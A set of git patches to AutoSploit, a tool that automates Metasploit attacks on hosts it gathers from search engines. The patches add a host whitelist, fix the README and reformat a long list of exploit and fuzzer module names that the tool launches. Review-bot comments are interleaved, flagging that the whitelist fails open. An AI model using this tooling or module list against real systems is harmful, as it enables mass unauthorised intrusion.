From: atucom <466817+atucom@users.noreply.github.com> Date: Thu, 29 Mar 2018 13:38:18 -0500 Subject: [PATCH 24/31] Cmdline Whitelist Feature (#110) * Added whitelist arg and modified the Exploiter call * added the whitelist_wash function * added whitelist prompt to terminal * added check for isspace() --- lib/cmdline/cmd.py | 7 ++++++- lib/exploitation/exploiter.py | 16 ++++++++++++++++ lib/term/terminal.py | 13 +++++++++++-- 3 files changed, 33 insertions(+), 3 deletions(-) diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index ec0d9ea..55425a2 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -67,6 +67,8 @@ def optparser(): help="pass the path to your framework if it is not in your ENV PATH") misc.add_argument("--ethics", action="store_true", dest="displayEthics", help=argparse.SUPPRESS) # easter egg! + misc.add_argument("--whitelist", metavar="PATH", dest="whitelist", + help="only exploit hosts listed in the whitelist file") opts = parser.parse_args() return opts @@ -160,10 +162,13 @@ def single_run_args(opt, keys, loaded_modules): keys["censys"][1], keys["censys"][0], opt.searchQuery, proxy=headers[0], agent=headers[1] ).censys() if opt.startExploit: + hosts = open(lib.settings.HOST_FILE).readlines() + if opt.whitelist: + hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist) lib.exploitation.exploiter.AutoSploitExploiter( opt.msfConfig, loaded_modules, - open(lib.settings.HOST_FILE).readlines(), + hosts, ruby_exec=opt.rubyExecutableNeeded, msf_path=opt.pathToFramework ).start_exploit() diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index f8cdc16..3525e5f 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py 
@@ -1,6 +1,22 @@ import lib.settings import lib.output +def whitelist_wash(hosts, whitelist_file): + """ + remove IPs from hosts list that do not appear in WHITELIST_FILE + """ + whitelist_hosts = open(whitelist_file).readlines() + lib.output.info('Found {} entries in whitelist.txt, scrubbing'.format(str(len(whitelist_hosts)))) + washed_hosts = [] + #return supplied hosts if whitelist file is empty + if len(whitelist_hosts) == 0: + return hosts + else: + for host in hosts: + if host in whitelist_hosts: + washed_hosts.append(host) + + return washed_hosts class AutoSploitExploiter(object): diff --git a/lib/term/terminal.py b/lib/term/terminal.py index f8766bc..c0bf2da 100644 --- a/lib/term/terminal.py +++ b/lib/term/terminal.py @@ -169,10 +169,19 @@ def exploit_gathered_hosts(self, loaded_mods, hosts=None): """ ruby_exec = False msf_path = None + whitelist_file = lib.output.prompt("specify full path to a whitelist file, otherwise hit enter", lowercase=False) if hosts is None: - host_file = open(self.host_path).readlines() + if whitelist_file is not "" and not whitelist_file.isspace(): + # If whitelist is specified, return a washed hosts list + host_file = lib.exploitation.exploiter.whitelist_wash(open(self.host_path).readlines(), whitelist_file) + else: + host_file = open(self.host_path).readlines() else: - host_file = open(hosts).readlines() + if whitelist_file is not "" and not whitelist_file.isspace(): + # If whitelist is specified, return a washed hosts list + host_file = lib.exploitation.exploiter.whitelist_wash(open(hosts).readlines(), whitelist_file) + else: + host_file = open(hosts).readlines() if not lib.settings.check_for_msf(): msf_path = lib.output.prompt( "it appears that MSF is not in your PATH, provide the full path to msfconsole" From 13526de3c83afb6e60a9a446f83bbf5781bd121e Mon Sep 17 00:00:00 2001 
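Review bot: `whitelist_wash` compares raw lines (`host in whitelist_hosts`, both lists straight from `readlines()`), so a whitelist whose last line lacks a trailing newline, or carries trailing whitespace, silently fails to match the corresponding host and that host is dropped; strip both sides before comparing and use a set for the lookup. More importantly for a scope control, `if len(whitelist_hosts) == 0: return hosts` fails open: an empty whitelist means every gathered host is exploited, which contradicts the `--whitelist` help text in `lib/cmdline/cmd.py` ("only exploit hosts listed in the whitelist file"), so returning an empty list with a warning is the safer default. The `info` message also hard-codes `whitelist.txt` although the path comes from `whitelist_file`, and the `open()` handle is never closed. A version addressing these is below; it changes the empty-whitelist behaviour deliberately.
```python
def whitelist_wash(hosts, whitelist_file):
    """
    keep only the hosts that appear in whitelist_file; an empty whitelist yields
    no hosts (fail closed) rather than exploiting everything
    """
    with open(whitelist_file) as f:
        # compare on stripped values so trailing newlines / whitespace in either file don't matter
        whitelist_hosts = {line.strip() for line in f if line.strip()}
    lib.output.info("Found {} entries in {}, scrubbing".format(len(whitelist_hosts), whitelist_file))
    if not whitelist_hosts:
        lib.output.warning("whitelist is empty, no hosts will be exploited")
        return []
    return [host for host in hosts if host.strip() in whitelist_hosts]
```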
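Review bot: `whitelist_file is not ""` compares a string with `is not`, which tests object identity rather than equality and only works by accident of interning (CPython emits a SyntaxWarning for it from 3.8); `whitelist_file != ""` is the intended check, or simply `whitelist_file.strip()` since the `isspace()` test follows anyway. The two arms of `if hosts is None:` then repeat the same four-line whitelist/no-whitelist decision differing only in which file is read; picking the source path first removes the duplication and leaves one place to close the handle. `lib.output.prompt(..., lowercase=False)` passes a keyword that is not visible in this diff, so it is worth confirming `prompt` accepts it. `exploit_gathered_hosts` begins and ends outside this hunk.
```python
        whitelist_file = lib.output.prompt("specify full path to a whitelist file, otherwise hit enter", lowercase=False)
        # read the default hosts file unless the caller supplied an explicit one
        source_path = self.host_path if hosts is None else hosts
        with open(source_path) as f:
            host_file = f.readlines()
        if whitelist_file.strip():
            # a whitelist was given: keep only the hosts that appear in it
            host_file = lib.exploitation.exploiter.whitelist_wash(host_file, whitelist_file)
        # … unchanged: MSF path check …
```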
From: atucom <466817+atucom@users.noreply.github.com> Date: Mon, 2 Apr 2018 21:49:11 -0500 Subject: [PATCH 25/31] fixed double active dev section in README (#115) --- README.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/README.md b/README.md index 22b5349..e253c11 100644 --- a/README.md +++ b/README.md @@ -160,10 +160,6 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. -### Active Development - -While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. - I've been working on the new version of the tool in an open source capacity with the help of a number of developers that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). From 74c6feff060b554ea8e23f91d2bb53c0fef2ccd0 Mon Sep 17 00:00:00 2001 From: Sebastien Lorrain Date: Tue, 3 Apr 2018 13:07:06 -0400 Subject: [PATCH 26/31] Exploit reporting (#116) * Added a helpful link directory * Update README.md * Update README.md * Update README.md * Added reporting to CSV file Metasploit output is logged (anything prefixed by '[+||-||*]') Changed from straight command-line invocation to rc-scripts per-hosts/per-modules. MSF module output to console * updating the output image * updating the output for this as well --- etc/json/default_modules.json | 570 +++++++++++++++++----------------- lib/exploitation/exploiter.py | 105 ++++++- lib/settings.py | 28 +- 3 files changed, 398 insertions(+), 305 deletions(-) diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index ca7f102..f30a51b 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json 
@@ -1,289 +1,289 @@ { "exploits": [ - "exploit/windows/firewall/blackice_pam_icq; exploit", - "exploit/windows/ftp/ms09_053_ftpd_nlst;exploit", - "exploit/windows/http/amlibweb_webquerydll_app;exploit", - "exploit/windows/http/ektron_xslt_exec_ws;exploit", - "exploit/windows/http/umbraco_upload_aspx;exploit", - "exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit", - "exploit/windows/iis/iis_webdav_upload_asp;exploit", - "exploit/windows/iis/ms01_023_printer;exploit", - "exploit/windows/iis/ms01_026_dbldecode;exploit", - "exploit/windows/iis/ms01_033_idq;exploit", - "exploit/windows/iis/ms02_018_htr;exploit", - "exploit/windows/iis/ms02_065_msadc;exploit", - "exploit/windows/iis/ms03_007_ntdll_webdav;exploit", - "exploit/windows/iis/msadc;exploit", - "exploit/windows/isapi/ms00_094_pbserver;exploit", - "exploit/windows/isapi/ms03_022_nsiislog_post;exploit", - "exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit", - "exploit/windows/isapi/rsa_webagent_redirect;exploit", - "exploit/windows/isapi/w3who_query;exploit", - "exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit", - "exploit/windows/ssl/ms04_011_pct;exploit", - "exploit/freebsd/http/watchguard_cmd_exec;exploit ", - "exploit/linux/http/alienvault_exec;exploit ", - "exploit/linux/http/alienvault_sqli_exec;exploit ", - "exploit/linux/http/astium_sqli_upload;exploit ", - "exploit/linux/http/centreon_sqli_exec;exploit ", - "exploit/linux/http/centreon_useralias_exec;exploit ", - "exploit/linux/http/crypttech_cryptolog_login_exec;exploit ", - "exploit/linux/http/dolibarr_cmd_exec;exploit ", - "exploit/linux/http/goautodial_3_rce_command_injection;exploit", - "exploit/linux/http/kloxo_sqli;exploit ", - "exploit/linux/http/nagios_xi_chained_rce;exploit ", - "exploit/linux/http/netgear_wnr2000_rce;exploit ", - "exploit/linux/http/pandora_fms_sqli;exploit ", - "exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit ", - "exploit/linux/http/wd_mycloud_multiupload_upload;exploit ", 
- "exploit/linux/http/zabbix_sqli;exploit ", - "exploit/linux/misc/qnap_transcode_server;exploit ", - "exploit/linux/mysql/mysql_yassl_getname;exploit ", - "exploit/linux/mysql/mysql_yassl_hello;exploit ", - "exploit/linux/postgres/postgres_payload;exploit ", - "exploit/linux/samba/is_known_pipename;exploit ", - "exploit/multi/browser/java_jre17_driver_manager;exploit ", - "exploit/multi/http/atutor_sqli;exploit ", - "exploit/multi/http/dexter_casinoloader_exec;exploit ", - "exploit/multi/http/drupal_drupageddon;exploit ", - "exploit/multi/http/manage_engine_dc_pmp_sqli;exploit ", - "exploit/multi/http/manageengine_search_sqli;exploit ", - "exploit/multi/http/movabletype_upgrade_exec;exploit ", - "exploit/multi/http/php_volunteer_upload_exe;exploit ", - "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit ", - "exploit/multi/http/splunk_mappy_exec;exploit ", - "exploit/multi/http/testlink_upload_exec;exploit ", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit ", - "exploit/multi/misc/legend_bot_exec;exploit ", - "exploit/multi/mysql/mysql_udf_payload;exploit ", - "exploit/multi/postgres/postgres_createlang;exploit ", - "exploit/solaris/sunrpc/ypupdated_exec;exploit ", - "exploit/unix/ftp/proftpd_133c_backdoor;exploit ", - "exploit/unix/http/tnftp_savefile;exploit ", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit ", - "exploit/unix/webapp/kimai_sqli;exploit ", - "exploit/unix/webapp/openemr_sqli_privesc_upload;exploit ", - "exploit/unix/webapp/seportal_sqli_exec;exploit ", - "exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit ", - "exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit", - "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit ", - "exploit/windows/http/apache_mod_rewrite_ldap;exploit ", - "exploit/windows/http/ca_totaldefense_regeneratereports;exploit", - "exploit/windows/http/cyclope_ess_sqli;exploit", - "exploit/windows/http/hp_mpa_job_acct;exploit", - 
"exploit/windows/http/solarwinds_storage_manager_sql;exploit", - "exploit/windows/http/sonicwall_scrutinizer_sql;exploit", - "exploit/windows/misc/altiris_ds_sqli;exploit ", - "exploit/windows/misc/fb_cnct_group;exploit ", - "exploit/windows/misc/lianja_db_net;exploit ", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit ", - "exploit/windows/mssql/lyris_listmanager_weak_pass;exploit ", - "exploit/windows/mssql/ms02_039_slammer;exploit ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit ", - "exploit/windows/mssql/mssql_linkcrawler;exploit ", - "exploit/windows/mssql/mssql_payload;exploit ", - "exploit/windows/mssql/mssql_payload_sqli;exploit ", - "exploit/windows/mysql/mysql_mof;exploit ", - "exploit/windows/mysql/mysql_start_up;exploit ", - "exploit/windows/mysql/mysql_yassl_hello;exploit", - "exploit/windows/mysql/scrutinizer_upload_exec;exploit ", - "exploit/windows/postgres/postgres_payload;exploit ", - "exploit/windows/scada/realwin_on_fcs_login;exploit", - "exploit/multi/http/rails_actionpack_inline_exec;exploit", - "exploit/multi/http/rails_dynamic_render_code_exec;exploit", - "exploit/multi/http/rails_json_yaml_code_exec;exploit", - "exploit/multi/http/rails_secret_deserialization;exploit", - "exploit/multi/http/rails_web_console_v2_code_exec;exploit", - "exploit/multi/http/rails_xml_yaml_code_exec;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/phpmoadmin_exec;exploit", - "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", - "exploit/multi/http/phpmyadmin_preg_replace;exploit", - "exploit/multi/http/phpscheduleit_start_date;exploit", - "exploit/multi/http/phptax_exec;exploit", - "exploit/multi/http/phpwiki_ploticus_exec;exploit", - "exploit/multi/http/plone_popen2;exploit", - "exploit/multi/http/pmwiki_pagelist;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit", - 
"exploit/multi/http/novell_servicedesk_rce;exploit", - "exploit/multi/http/oracle_reports_rce;exploit", - "exploit/multi/http/php_utility_belt_rce;exploit", - "exploit/multi/http/phpfilemanager_rce;exploit", - "exploit/multi/http/processmaker_exec;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/spree_search_exec;exploit", - "exploit/multi/http/spree_searchlogic_exec;exploit", - "exploit/multi/http/struts_code_exec_parameters;exploit", - "exploit/multi/http/vtiger_install_rce;exploit", - "exploit/multi/http/werkzeug_debug_rce;exploit", - "exploit/multi/http/zemra_panel_rce;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit", - "exploit/unix/webapp/joomla_akeeba_unserialize;exploit", - "exploit/unix/webapp/joomla_comjce_imgmanager;exploit", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", - "exploit/unix/webapp/joomla_media_upload_exec;exploit", - "exploit/multi/http/builderengine_upload_exec;exploit", - "exploit/multi/http/caidao_php_backdoor_exec;exploit", - "exploit/multi/http/atutor_sqli;exploit ", - "exploit/multi/http/ajaxplorer_checkinstall_exec;exploit", - "exploit/multi/http/apache_activemq_upload_jsp;exploit -", - "exploit/unix/webapp/wp_lastpost_exec;exploit -", - "exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit", - "exploit/multi/http/axis2_deployer;exploit", - "exploit/unix/webapp/wp_foxypress_upload;exploit", - "exploit/linux/http/tr064_ntpserver_cmdinject;exploit", - "exploit/linux/misc/quest_pmmasterd_bof;exploit", - "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit", - "exploit/unix/webapp/php_xmlrpc_eval;exploit", - "exploit/unix/webapp/wp_admin_shell_upload;exploit", - "exploit/linux/http/sophos_wpa_sblistpack_exec;exploit", - "exploit/linux/local/sophos_wpa_clear_keys;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - 
"auxiliary/admin/cisco/cisco_asa_extrabacon;exploit", - "auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit", - "auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit", - "exploit/bsdi/softcart/mercantec_softcart;exploit ", - "exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit", - "exploit/freebsd/samba/trans2open;exploit", - "exploit/linux/ftp/proftp_sreplace;exploit ", - "exploit/linux/http/dcos_marathon;exploit", - "exploit/linux/http/f5_icall_cmd;exploit", - "exploit/linux/http/fritzbox_echo_exec;exploit", - "exploit/linux/http/gitlist_exec;exploit", - "exploit/linux/http/goautodial_3_rce_command_injection;exploit", - "exploit/linux/http/ipfire_bashbug_exec;exploit", - "exploit/linux/http/ipfire_oinkcode_exec;exploit", - "exploit/linux/http/ipfire_proxy_exec;exploit", - "exploit/linux/http/kaltura_unserialize_rce;exploit", - "exploit/linux/http/lifesize_uvc_ping_rce;exploit", - "exploit/linux/http/nagios_xi_chained_rce;exploit", - "exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit", - "exploit/linux/http/netgear_wnr2000_rce ;exploit", - "exploit/linux/http/nuuo_nvrmini_auth_rce;exploit", - "exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit", - "exploit/linux/http/op5_config_exec;exploit", - "exploit/linux/http/pandora_fms_exec;exploit", - "exploit/linux/http/pineapple_preconfig_cmdinject;exploit", - "exploit/linux/http/seagate_nas_php_exec_noauth;exploit", - "exploit/linux/http/symantec_messaging_gateway_exec;exploit", - "exploit/linux/http/trendmicro_imsva_widget_exec;exploit", - "exploit/linux/http/trueonline_billion_5200w_rce;exploit", - "exploit/linux/http/trueonline_p660hn_v1_rce;exploit", - "exploit/linux/http/trueonline_p660hn_v2_rce;exploit", - "exploit/linux/http/vcms_upload;exploit", - "exploit/linux/misc/lprng_format_string;exploit", - "exploit/linux/misc/mongod_native_helper;exploit", - "exploit/linux/misc/ueb9_bpserverd;exploit", - "exploit/linux/mysql/mysql_yassl_getname;exploit", - 
"exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit", - "exploit/linux/postgres/postgres_payload;exploit", - "exploit/linux/pptp/poptop_negative_read;exploit", - "exploit/linux/proxy/squid_ntlm_authenticate;exploit", - "exploit/linux/samba/lsa_transnames_heap;exploit", - "exploit/linux/samba/setinfopolicy_heap;exploit", - "exploit/linux/samba/trans2open;exploit", - "exploit/multi/elasticsearch/script_mvel_rce;exploit", - "exploit/multi/elasticsearch/search_groovy_script;exploit", - "exploit/multi/http/atutor_sqli;exploit", - "exploit/multi/http/axis2_deployer;exploit", - "exploit/multi/http/familycms_less_exe;exploit", - "exploit/multi/http/freenas_exec_raw;exploit", - "exploit/multi/http/gestioip_exec;exploit", - "exploit/multi/http/glassfish_deployer;exploit", - "exploit/multi/http/glpi_install_rce;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit ", - "exploit/multi/http/makoserver_cmd_exec;exploit", - "exploit/multi/http/novell_servicedesk_rc;exploit", - "exploit/multi/http/oracle_reports_rce;exploit", - "exploit/multi/http/php_utility_belt_rce;exploit", - "exploit/multi/http/phpfilemanager_rce;exploit", - "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", - "exploit/multi/http/phpwiki_ploticus_exec;exploit", - "exploit/multi/http/processmaker_exec;exploit", - "exploit/multi/http/rails_actionpack_inline_exec;exploit", - "exploit/multi/http/rails_dynamic_render_code_exec;exploit", - "exploit/multi/http/rails_secret_deserialization;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/simple_backdoors_exec;exploit", - "exploit/multi/http/spree_search_exec;exploit", - "exploit/multi/http/spree_searchlogic_exec;exploit", - "exploit/multi/http/struts2_rest_xstream;exploit", - "exploit/multi/http/struts_code_exec;exploit", - "exploit/multi/http/struts_code_exec_classloader;exploit", - "exploit/multi/http/struts_code_exec_parameters;exploit", - "exploit/multi/http/struts_dev_mode;exploit", - 
"exploit/multi/http/sysaid_auth_file_upload;exploit", - "exploit/multi/http/tomcat_jsp_upload_bypass;exploit", - "exploit/multi/http/vtiger_install_rce;exploit", - "exploit/multi/http/werkzeug_debug_rce;exploit", - "exploit/multi/http/zemra_panel_rce;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "exploit/multi/ids/snort_dce_rpc;exploit", - "exploit/multi/misc/batik_svg_java;exploit", - "exploit/multi/misc/pbot_exec;exploit", - "exploit/multi/misc/veritas_netbackup_cmdexec;exploit", - "exploit/multi/mysql/mysql_udf_payload;exploit", - "exploit/multi/php/php_unserialize_zval_cookie;exploit", - "exploit/unix/http/freepbx_callmenum;exploit", - "exploit/unix/http/lifesize_room;exploit", - "exploit/unix/http/pfsense_clickjacking;exploit", - "exploit/unix/http/pfsense_group_member_exec;exploit", - "exploit/unix/http/tnftp_savefile;exploit", - "exploit/unix/misc/polycom_hdx_traceroute_exec;exploit", - "exploit/unix/webapp/awstats_migrate_exec;exploit", - "exploit/unix/webapp/carberp_backdoor_exec;exploit", - "exploit/unix/webapp/citrix_access_gateway_exec;exploit", - "exploit/unix/webapp/dogfood_spell_exec;exploit", - "exploit/unix/webapp/invision_pboard_unserialize_exec;exploit", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", - "exploit/unix/webapp/mybb_backdoor;exploit", - "exploit/unix/webapp/opensis_modname_exec;exploit", - "exploit/unix/webapp/oscommerce_filemanager;exploit", - "exploit/unix/webapp/piwik_superuser_plugin_upload;exploit", - "exploit/unix/webapp/tikiwiki_upload_exec;exploit", - "exploit/unix/webapp/webtester_exec;exploit", - "exploit/unix/webapp/wp_phpmailer_host_header;exploit", - "exploit/unix/webapp/wp_total_cache_exec;exploit", - "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit", - "exploit/windows/http/ektron_xslt_exec;exploit", - "exploit/windows/http/ektron_xslt_exec_ws;exploit", - "exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit", - 
"exploit/windows/http/hp_autopass_license_traversal;exploit", - "exploit/windows/http/manage_engine_opmanager_rce;exploit", - "exploit/windows/http/netgear_nms_rce;exploit", - "exploit/windows/http/sepm_auth_bypass_rce;exploit", - "exploit/windows/http/trendmicro_officescan_widget_exec;exploit", - "exploit/windows/iis/iis_webdav_upload_asp;exploit", - "exploit/windows/iis/msadc;exploit", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit", - "exploit/windows/novell/file_reporter_fsfui_upload;exploit", - "exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit", - "exploit/windows/smb/ipass_pipe_exec;exploit", - "exploit/windows/smb/smb_relay;exploit", - "auxiliary/sqli/oracle/jvm_os_code_10g;exploit", - "auxiliary/sqli/oracle/jvm_os_code_11g;exploit", - "auxiliary/fuzzers/dns/dns_fuzzer;exploit", - "auxiliary/fuzzers/ftp/client_ftp;exploit", - "auxiliary/fuzzers/ftp/ftp_pre_post;exploit", - "auxiliary/fuzzers/http/http_form_field;exploit", - "auxiliary/fuzzers/http/http_get_uri_long;exploit", - "auxiliary/fuzzers/http/http_get_uri_strings;exploit", - "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit", - "auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_create_pipe;exploit", - "auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit ", - "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_tree_connect;exploit", - "auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit", - "auxiliary/fuzzers/smtp/smtp_fuzzer;exploit", - "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit", - "auxiliary/fuzzers/ssh/ssh_version_15;exploit", - "auxiliary/fuzzers/ssh/ssh_version_2;exploit", - "auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit", - "auxiliary/fuzzers/tds/tds_login_corrupt;exploit", - "auxiliary/fuzzers/tds/tds_login_username;exploit" + "exploit/windows/ftp/ms09_053_ftpd_nlst", + "exploit/windows/firewall/blackice_pam_icq", + 
"exploit/windows/http/amlibweb_webquerydll_app", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/umbraco_upload_aspx", + "exploit/windows/iis/iis_webdav_scstoragepathfromurl", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/ms01_023_printer", + "exploit/windows/iis/ms01_026_dbldecode", + "exploit/windows/iis/ms01_033_idq", + "exploit/windows/iis/ms02_018_htr", + "exploit/windows/iis/ms02_065_msadc", + "exploit/windows/iis/ms03_007_ntdll_webdav", + "exploit/windows/iis/msadc", + "exploit/windows/isapi/ms00_094_pbserver", + "exploit/windows/isapi/ms03_022_nsiislog_post", + "exploit/windows/isapi/ms03_051_fp30reg_chunked", + "exploit/windows/isapi/rsa_webagent_redirect", + "exploit/windows/isapi/w3who_query", + "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", + "exploit/windows/ssl/ms04_011_pct", + "exploit/freebsd/http/watchguard_cmd_exec ", + "exploit/linux/http/alienvault_exec ", + "exploit/linux/http/alienvault_sqli_exec ", + "exploit/linux/http/astium_sqli_upload ", + "exploit/linux/http/centreon_sqli_exec ", + "exploit/linux/http/centreon_useralias_exec ", + "exploit/linux/http/crypttech_cryptolog_login_exec ", + "exploit/linux/http/dolibarr_cmd_exec ", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/kloxo_sqli ", + "exploit/linux/http/nagios_xi_chained_rce ", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/pandora_fms_sqli ", + "exploit/linux/http/riverbed_netprofiler_netexpress_exe ", + "exploit/linux/http/wd_mycloud_multiupload_upload ", + "exploit/linux/http/zabbix_sqli ", + "exploit/linux/misc/qnap_transcode_server ", + "exploit/linux/mysql/mysql_yassl_getname ", + "exploit/linux/mysql/mysql_yassl_hello ", + "exploit/linux/postgres/postgres_payload ", + "exploit/linux/samba/is_known_pipename ", + "exploit/multi/browser/java_jre17_driver_manager ", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/dexter_casinoloader_exec ", + 
"exploit/multi/http/drupal_drupageddon ", + "exploit/multi/http/manage_engine_dc_pmp_sqli ", + "exploit/multi/http/manageengine_search_sqli ", + "exploit/multi/http/movabletype_upgrade_exec ", + "exploit/multi/http/php_volunteer_upload_exe ", + "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", + "exploit/multi/http/splunk_mappy_exec ", + "exploit/multi/http/testlink_upload_exec ", + "exploit/multi/http/zpanel_information_disclosure_rce ", + "exploit/multi/misc/legend_bot_exec ", + "exploit/multi/mysql/mysql_udf_payload ", + "exploit/multi/postgres/postgres_createlang ", + "exploit/solaris/sunrpc/ypupdated_exec ", + "exploit/unix/ftp/proftpd_133c_backdoor ", + "exploit/unix/http/tnftp_savefile ", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", + "exploit/unix/webapp/kimai_sqli ", + "exploit/unix/webapp/openemr_sqli_privesc_upload ", + "exploit/unix/webapp/seportal_sqli_exec ", + "exploit/unix/webapp/vbulletin_vote_sqli_exec ", + "exploit/unix/webapp/vicidial_manager_send_cmd_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce ", + "exploit/windows/http/apache_mod_rewrite_ldap ", + "exploit/windows/http/ca_totaldefense_regeneratereports", + "exploit/windows/http/cyclope_ess_sqli", + "exploit/windows/http/hp_mpa_job_acct", + "exploit/windows/http/solarwinds_storage_manager_sql", + "exploit/windows/http/sonicwall_scrutinizer_sql", + "exploit/windows/misc/altiris_ds_sqli ", + "exploit/windows/misc/fb_cnct_group ", + "exploit/windows/misc/lianja_db_net ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", + "exploit/windows/mssql/lyris_listmanager_weak_pass ", + "exploit/windows/mssql/ms02_039_slammer ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", + "exploit/windows/mssql/mssql_linkcrawler ", + "exploit/windows/mssql/mssql_payload ", + "exploit/windows/mssql/mssql_payload_sqli ", + "exploit/windows/mysql/mysql_mof ", + 
"exploit/windows/mysql/mysql_start_up ", + "exploit/windows/mysql/mysql_yassl_hello", + "exploit/windows/mysql/scrutinizer_upload_exec ", + "exploit/windows/postgres/postgres_payload ", + "exploit/windows/scada/realwin_on_fcs_login", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_json_yaml_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rails_web_console_v2_code_exec", + "exploit/multi/http/rails_xml_yaml_code_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/phpmoadmin_exec", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpmyadmin_preg_replace", + "exploit/multi/http/phpscheduleit_start_date", + "exploit/multi/http/phptax_exec", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/plone_popen2", + "exploit/multi/http/pmwiki_pagelist", + "exploit/multi/http/joomla_http_header_rce", + "exploit/multi/http/novell_servicedesk_rce", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/http/joomla_http_header_rce", + "exploit/unix/webapp/joomla_akeeba_unserialize", + "exploit/unix/webapp/joomla_comjce_imgmanager", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/joomla_media_upload_exec", + "exploit/multi/http/builderengine_upload_exec", + "exploit/multi/http/caidao_php_backdoor_exec", + "exploit/multi/http/atutor_sqli ", 
